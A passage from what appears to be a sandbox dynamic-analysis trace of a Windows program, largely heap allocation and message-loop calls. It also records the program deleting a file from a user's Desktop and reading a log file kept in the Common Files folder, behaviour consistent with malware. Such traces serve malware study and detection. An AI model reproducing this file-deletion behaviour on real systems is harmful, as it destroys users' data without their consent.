hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab68 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6969c0 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.427] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6aa0a0 [0076.427] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6aa0a0 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.428] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.428] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dbd0 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6f0 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b270 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd88 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.428] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db30 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd38 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb558 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da40 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d928 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb438 | out: hHeap=0x650000) returned 1 [0076.429] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x75b820 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0076.430] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0076.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df90 [0076.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0076.430] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0076.431] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.431] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690970 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690660 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690660 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.431] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b450 | out: hHeap=0x650000) returned 1 [0076.431] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690800 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690820 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e0f0 [0076.432] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0076.432] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.432] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.433] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.435] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.435] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.435] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.435] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.435] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.435] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0076.435] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.435] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.436] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.436] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.436] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.436] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.436] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", nBufferLength=0x7fff, lpBuffer=0x60ea80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpFilePart=0x0) returned 0x2f [0076.437] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0xca5566a0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 0x6b89f8 [0076.437] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7tiqi.m4a")) returned 1 [0076.438] FindNextFileW (in: hFindFile=0x6b89f8, lpFindFileData=0x61eac8 | out: lpFindFileData=0x61eac8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0xca5566a0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x63f910, dwReserved1=0x77cb1ecd, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 0 [0076.438] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0076.438] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.439] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.439] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0076.439] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.439] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0076.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0076.440] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.440] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.440] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.440] PeekMessageW (in: lpMsg=0x61ec4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec4c) returned 0 [0076.440] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0076.440] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.441] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eedc | out: lpNewFilePointer=0x0) returned 1 [0076.441] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.441] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eebc | out: lpNewFilePointer=0x0) returned 1 [0076.441] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61eecc | out: lpNewFilePointer=0x0) returned 1 [0076.441] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x3ee, lpOverlapped=0x0) returned 1 [0076.442] ReadFile (in: hFile=0x140, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61eef4*=0x0, lpOverlapped=0x0) returned 1 [0076.442] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x3ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.442] SetFilePointerEx (in: 